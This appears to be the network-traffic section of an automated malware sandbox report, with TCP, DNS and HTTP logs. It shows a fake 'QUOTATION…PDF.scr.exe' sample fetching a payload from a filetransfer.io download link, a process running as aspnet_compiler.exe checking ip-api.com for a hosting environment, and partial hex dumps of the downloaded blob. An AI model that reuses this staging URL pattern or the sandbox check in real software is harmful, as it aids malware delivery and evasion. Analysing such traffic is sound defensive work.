                          Jul 3, 2024 18:08:13.582123041 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582166910 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.582508087 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582539082 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582577944 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.582585096 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582614899 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.582633972 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.583164930 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583185911 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583231926 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.583240032 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583266020 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.583298922 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.583725929 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583748102 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583806992 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.583815098 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.583858013 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.584342003 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.584367990 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.584403038 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.584412098 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.584453106 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.584460020 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.586980104 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.587018967 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.587048054 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.587054968 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.587094069 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.587245941 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.589025021 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.589052916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.589095116 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.589102030 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.589124918 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.589142084 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672009945 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672049999 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672173977 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672188997 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672276974 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672797918 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672821999 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672961950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672969103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673142910 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673358917 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673378944 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673419952 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673428059 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673455954 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673475981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673826933 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673847914 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673909903 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673917055 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673959017 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.674283981 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674303055 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674592018 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.674598932 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674650908 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.675493956 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675513983 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675630093 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.675637007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675688028 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.677781105 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677802086 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677866936 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.677875996 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677917004 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.680179119 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680200100 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680263042 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.680270910 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680310965 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763264894 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763289928 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763432026 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763447046 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763499975 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763912916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763943911 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764000893 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764009953 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764065981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764112949 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764133930 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764194012 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764199972 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764250040 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764941931 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764964104 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765028000 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765036106 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765088081 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765327930 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765350103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765398979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765407085 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765418053 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765446901 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765492916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765558958 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.766052008 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:57.412853003 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:57.681502104 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.687458992 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:57.687546968 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.687819004 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.693525076 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:58.176054955 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:58.225236893 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:09:46.146994114 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:09:46.147154093 CEST4971380192.168.2.8208.95.112.1

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 3, 2024 18:08:08.410398960 CEST4965153192.168.2.81.1.1.1
                          Jul 3, 2024 18:08:08.423037052 CEST53496511.1.1.1192.168.2.8
                          Jul 3, 2024 18:08:10.677411079 CEST5586853192.168.2.81.1.1.1
                          Jul 3, 2024 18:08:10.689913988 CEST53558681.1.1.1192.168.2.8
                          Jul 3, 2024 18:08:57.666979074 CEST6380853192.168.2.81.1.1.1
                          Jul 3, 2024 18:08:57.674412012 CEST53638081.1.1.1192.168.2.8

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 3, 2024 18:08:08.410398960 CEST192.168.2.81.1.1.10xf56aStandard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:10.677411079 CEST192.168.2.81.1.1.10x61a8Standard query (0)s21.filetransfer.ioA (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:57.666979074 CEST192.168.2.81.1.1.10xc25cStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 3, 2024 18:08:08.423037052 CEST1.1.1.1192.168.2.80xf56aNo error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:08.423037052 CEST1.1.1.1192.168.2.80xf56aNo error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:10.689913988 CEST1.1.1.1192.168.2.80x61a8No error (0)s21.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:10.689913988 CEST1.1.1.1192.168.2.80x61a8No error (0)s21.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                          Jul 3, 2024 18:08:57.674412012 CEST1.1.1.1192.168.2.80xc25cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • filetransfer.io
                          • s21.filetransfer.io
                          • ip-api.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849705188.114.96.3807612C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          TimestampBytes transferredDirectionData
                          Jul 3, 2024 18:08:08.438275099 CEST95OUTGET /data-package/btd2ptah/download HTTP/1.1
                          Host: filetransfer.io
                          Connection: Keep-Alive
                          Jul 3, 2024 18:08:09.095911026 CEST816INHTTP/1.1 301 Moved Permanently
                          Date: Wed, 03 Jul 2024 16:08:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Location: https://filetransfer.io/data-package/btd2ptah/download
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skvXQPBLvPLXZx8KmTCvuNTLX4t93RIwOsSFS98bIk0B3HqW61h8Y56rNuWJzRAxsnqPpCP3FV8i6s570Usl%2FGyUP4hsXFH8NXJycx1o5ORR4%2BD80fvutM3NPdX6C9DoPi4%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821ef492d7ca2-EWR
                          alt-svc: h3=":443"; ma=86400
                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.849713208.95.112.1805584C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          TimestampBytes transferredDirectionData
                          Jul 3, 2024 18:08:57.687819004 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Jul 3, 2024 18:08:58.176054955 CEST175INHTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 16:08:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 33
                          X-Rl: 42
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849706188.114.96.34437612C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          TimestampBytes transferredDirectionData
                          2024-07-03 16:08:09 UTC95OUTGET /data-package/btd2ptah/download HTTP/1.1
                          Host: filetransfer.io
                          Connection: Keep-Alive
                          2024-07-03 16:08:10 UTC1055INHTTP/1.1 302 Found
                          Date: Wed, 03 Jul 2024 16:08:10 GMT
                          Content-Type: text/html; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Powered-By: Nette Framework 3
                          X-Frame-Options: SAMEORIGIN
                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                          Set-Cookie: PHPSESSID=ca6te0j24gbgu6n6hlqe7vvknl; expires=Wed, 17-Jul-2024 16:08:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          Vary: X-Requested-With
                          Location: https://s21.filetransfer.io/storage/download/FiMxpnoPTxVw
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qbk8uR8s2IAsLI4vSlt8ZfI6piNqwKdstAKBjnapKoA6H5Yp5%2FU7up848%2Fp7qIek3Lo4izNN6qppBbHWZwQ%2BX2oz5N8eh1npH2DWoGexDsJ%2FmmW1YCnoZIhyKwSNObol0lg%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821f63ca87cb1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-03 16:08:10 UTC134INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 31 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 46 69 4d 78 70 6e 6f 50 54 78 56 77 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                          Data Ascii: 80<h1>Redirect</h1><p><a href="https://s21.filetransfer.io/storage/download/FiMxpnoPTxVw">Please click here to continue</a>.</p>
                          2024-07-03 16:08:10 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.849707188.114.96.34437612C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          TimestampBytes transferredDirectionData
                          2024-07-03 16:08:11 UTC98OUTGET /storage/download/FiMxpnoPTxVw HTTP/1.1
                          Host: s21.filetransfer.io
                          Connection: Keep-Alive
                          2024-07-03 16:08:12 UTC1065INHTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 16:08:11 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2261000
                          Connection: close
                          Last-Modified: Tue, 02 Jul 2024 09:00:30 GMT
                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                          Set-Cookie: PHPSESSID=e021f8dcdea1c14f18e9f01cb6ff925b; expires=Wed, 17-Jul-2024 16:08:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Content-Disposition: attachment; filename="Vceszwqjme.dat"
                          Accept-Ranges: bytes
                          Accept-Ranges: bytes
                          ETag: "6683c1ae-228008"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZasvEHxvw2QwEqjl6ogA8%2FAmRTJXf%2BRgDOnSMXOkYfBES%2BIAJA8sGqvzAQ9nkwW0QIJhgSYRs%2Fch5BcHCD%2FqNYRgBILbRQ5nP2Ums%2FkG%2Bc2zIQTWaXX65jvokhIvYjmvrVn0e4FR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821fe5f138c71-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-03 16:08:12 UTC304INData Raw: 04 91 65 3e 86 79 42 40 15 3c 46 a7 44 ee 54 07 8b d0 7a 23 28 0f dc 78 7f e3 9a 21 06 c2 e1 06 57 77 92 4e b8 a0 32 b8 d1 dc 55 dd fb 1a 19 d9 13 d4 07 69 45 37 32 58 b7 14 8b 64 f3 84 84 8a 9e 11 4b 43 78 5a ce ce de 31 2e 2e 67 54 e6 95 4d 86 77 e7 0e 27 31 0b 52 3d a9 ea 25 88 38 14 09 12 c8 af a1 1d ac be 84 4f 75 8e b9 89 a2 bc 29 cb 97 23 5d 84 79 00 ed 3e 96 ce 0f 47 90 2f 9f d0 e7 93 48 ea db 6f a9 98 fa c9 12 17 4c a2 a2 45 53 30 5f eb 70 7b ec 9b c7 75 02 2b ee 68 38 b9 82 4a a9 93 b8 5e 86 42 6e 36 28 a2 09 61 e9 a2 9d 67 31 76 e1 51 5e 68 30 83 fb b3 7b 81 c5 fa 30 ee ff ea b2 ac d4 ed 94 34 10 ee dd 5c 40 d1 59 79 58 69 94 91 04 3e 3a 39 50 a5 ab 76 e3 60 90 67 9d 0c 6d ea 7e b8 e5 50 7c 73 23 b3 4a e9 77 a9 1a 39 50 f8 6a 34 3d 36 0a f1 56
                          Data Ascii: e>yB@<FDTz#(x!WwN2UiE72XdKCxZ1..gTMw'1R=%8Ou)#]y>G/HoLES0_p{u+h8J^Bn6(ag1vQ^h0{04\@YyXi>:9Pv`gm~P|s#Jw9Pj4=6V
                          2024-07-03 16:08:12 UTC1369INData Raw: 18 50 f1 41 d9 1a 4e af 5b 7c 76 5c 99 c6 0e f5 34 f4 56 39 af 36 30 bd 43 f7 78 bf 01 85 87 b7 05 78 3b 76 0f a3 1b 1f d7 32 79 f5 f5 77 94 fb 25 a5 d7 f8 47 36 74 28 fe 2b 31 2f 49 6b 88 0a 2f 78 14 7a df d2 89 e4 1e cd 97 d0 54 0c 87 de 8a 45 ea f8 14 94 89 6c ca 2a 00 01 42 55 8b 3d ba fd 5e f2 d9 58 ee 4c 71 a1 2d ee 1d ec 4f 7a a3 83 d0 ba 2b 03 11 6c 01 3f b1 55 ab bb f4 34 5d e3 b2 fa 04 cd 11 ea 37 8f 17 a1 57 9c b1 b0 38 bd b9 9d bf 13 d4 4a af d4 84 c4 21 c6 0d 6b 9c 3e b9 c1 ff 6c 56 ba 51 a6 53 73 ae b8 c1 f3 39 c4 bc 35 15 f0 c1 f4 f4 3c 69 21 d2 60 a7 cf 6c 25 15 8a 3a f8 b8 98 da 32 c9 c0 e3 0d f9 d1 c5 0a 04 dd 32 87 68 76 5b f2 d0 44 e9 24 94 ba 0f 56 f7 35 bc 71 86 5e e5 f4 89 5f c9 81 47 9f 71 6c 68 75 b2 cd 7e 16 9a 89 ce 26 da 4d 45
                          Data Ascii: PAN[|v\4V960Cxx;v2yw%G6t(+1/Ik/xzTEl*BU=^XLq-Oz+l?U4]7W8J!k>lVQSs95<i!`l%:22hv[D$V5q^_Gqlhu~&ME
                          2024-07-03 16:08:12 UTC1369INData Raw: 76 b8 b2 42 4e 00 1b 12 85 69 8f 6a 41 8d f1 ec b2 89 53 30 3f 29 97 2b b6 4f 02 14 82 f9 89 0c b1 ce 83 9f 54 e1 4d 7d 2c 5d d6 05 dd 8f 45 5a ee 7f f7 48 d1 57 03 34 59 1c 86 1b 44 f0 62 1b 03 ad 18 68 e2 8e 34 f7 75 db 16 39 3d 85 2b 83 e0 99 6a cc 95 0b 8c ea 67 e0 3f 9c 89 22 dd ec b4 f0 49 ff 67 53 ed 58 52 3f d0 e2 a8 eb cd 3b e3 05 8a da 4a b5 dd c3 88 f9 b7 e7 7d a7 75 c1 86 10 d0 a3 48 52 b4 8e 60 55 3e 19 94 b9 2e e4 6e 59 ef 8d 85 42 ad e0 b7 58 dd 64 26 c1 eb 80 f1 4c 20 f6 01 63 c2 85 6c d8 7a 7a 3d 3f ae da 91 07 1a ba fd a2 f9 73 ad 43 f8 a0 e4 13 60 13 a0 69 e4 44 80 9e 9f bc 5c bb 54 88 5f 19 0b d2 ad 9b 69 09 fb 5c 21 62 ca 81 af 05 8a 5d 1c 7f 78 4f d8 fb ed a2 10 b9 32 d1 a5 21 19 c6 60 2e 22 32 81 36 fd 84 99 09 91 0f cb 97 3f 01 e2
                          Data Ascii: vBNijAS0?)+OTM},]EZHW4YDbh4u9=+jg?"IgSXR?;J}uHR`U>.nYBXd&L clzz=?sC`iD\T_i\!b]xO2!`."26?
                          2024-07-03 16:08:12 UTC1369INData Raw: 4f 10 2d be 0b 98 ea 3c 58 58 5b 51 48 05 ee 38 0b d8 67 c8 6c 61 1b a7 c6 d7 83 88 1d f3 8a 7f 14 c6 a9 85 a0 68 e6 83 b8 19 ab 86 5f a3 d1 22 09 5c c5 2b 3f 6f 30 3d f3 77 1d 42 63 44 f5 7a 89 14 e0 c1 18 f8 fb 79 fc 12 a2 af 76 9b 14 61 5f e8 2b e6 ae 4a f3 73 5d 23 ce 07 22 0e ce aa ff 10 9b 68 e7 52 56 f1 2f 1b ef 72 b3 91 41 12 df eb 2d 9f 18 95 2e ec 98 a8 c7 6a 1a 1f 66 af c8 17 f7 7f 3d 46 ac d1 13 b2 1c 42 26 12 33 14 d4 6f d5 92 66 8c cd 7e 32 ba ac 57 43 3a 78 dc 6f e4 45 54 6a dd c3 69 de be 03 cb cc 35 08 0b 36 36 7b 6d 34 b9 cd ad d2 e5 34 88 9a 85 47 d9 14 44 36 f5 ba 83 21 1e 4a a5 df 43 16 d6 60 42 a3 1d 04 ea b8 2a bc 0a af 82 83 d8 12 db c6 63 91 17 da 94 11 6d 90 95 46 c7 8a a6 a5 c2 a9 14 ff 44 28 fb 1b 7a b9 9a bf 4c 4b e4 fc 6c 2e
                          Data Ascii: O-<XX[QH8glah_"\+?o0=wBcDzyva_+Js]#"hRV/rA-.jf=FB&3of~2WC:xoETji566{m44GD6!JC`B*cmFD(zLKl.
                          2024-07-03 16:08:12 UTC1369INData Raw: 56 32 03 1f d1 bb c7 99 4d ae eb 38 5f 47 f0 b1 cf e7 5b bf 49 df 2b 33 c3 df 73 e5 cb 99 a2 c1 a7 5b 36 0e e0 b4 06 a3 7c 98 ba 2c 2c 2f a2 b6 48 61 62 4a c8 15 37 8d 27 1a f7 8f 1a 36 30 76 49 09 7c d5 91 73 7d 17 c5 b0 58 7b 8c 04 95 b9 5c 70 38 a8 56 47 b1 51 c6 0e 10 65 94 93 9d b0 98 84 bf 5f 7c f1 ff a7 20 f2 56 0f fc 82 95 46 ca d2 1a 7b 2f d2 af 7a 7f 57 10 f4 59 58 4a 12 6e 39 fc 6c 2d b6 0b e8 88 76 c1 bf cf 2a e8 4c f5 83 96 20 ca ea 16 a1 4d ca 03 40 26 0b a4 15 2d 84 29 22 28 3f 29 db c7 2f 0d e2 3d 22 c4 12 5a 0e 72 60 22 c8 0f c0 e2 eb 68 14 42 85 2e 8f d0 7e 53 dd 9e 27 43 13 b5 a4 49 1f 80 4e 9a 05 5f b4 48 b9 74 c2 33 d1 ad 18 86 82 be 69 a6 eb 67 3f d0 80 13 31 b0 81 bb 41 7f 4c ed dd 19 46 5b dc d1 df 71 0c 1d 7f d1 45 f7 b9 bd 4f c6
                          Data Ascii: V2M8_G[I+3s[6|,,/HabJ7'60vI|s}X{\p8VGQe_| VF{/zWYXJn9l-v*L M@&-)"(?)/="Zr`"hB.~S'CIN_Ht3ig?1ALF[qEO
                          2024-07-03 16:08:12 UTC1369INData Raw: 1d b0 87 90 33 44 da c6 f0 0e 00 ee 89 f0 f9 36 38 8d f6 e7 7b e3 8b f3 96 bc 12 57 61 4f 4c b8 5d fa 52 e4 7b 44 bf 2a 54 f2 96 ee b8 71 ca a8 40 f4 70 bc d3 96 c5 50 2f 2f b8 29 1c 48 0c 5d e5 ba 2b 0d f6 2f fc 58 3c 43 67 17 95 ae 0a 86 9d 9d 77 3c b9 7f 4a c8 c0 d4 bc 23 95 e7 35 9d 20 12 16 5e f5 6c 21 5d c0 5c 11 11 62 a3 8c 09 35 0c 51 ee 16 ed 1a b1 80 b8 7e b3 27 4f d8 be 68 da 5e 97 fb c6 42 49 4d 77 1b 2f cb df 23 78 7e 96 2c 45 25 66 33 01 24 6b 50 4d ee 43 5b 67 5f 06 2e e4 10 27 ff d5 d8 7a 67 68 59 29 04 86 47 ea 1c c6 fd 2e 43 55 94 04 4b e0 bc df 16 b5 3f 88 71 6c fb ad 4b d4 f1 89 50 a1 1b 12 a4 8c 0c 6b 43 07 24 57 db c8 11 29 54 2b 53 35 95 73 27 1b 72 cb d1 58 c6 18 7b 86 f0 f3 89 23 c9 5f a1 75 c5 36 0b 86 55 27 3a 46 b4 9e 12 95 98
                          Data Ascii: 3D68{WaOL]R{D*Tq@pP//)H]+/X<Cgw<J#5 ^l!]\b5Q~'Oh^BIMw/#x~,E%f3$kPMC[g_.'zghY)G.CUK?qlKPkC$W)T+S5s'rX{#_u6U':F
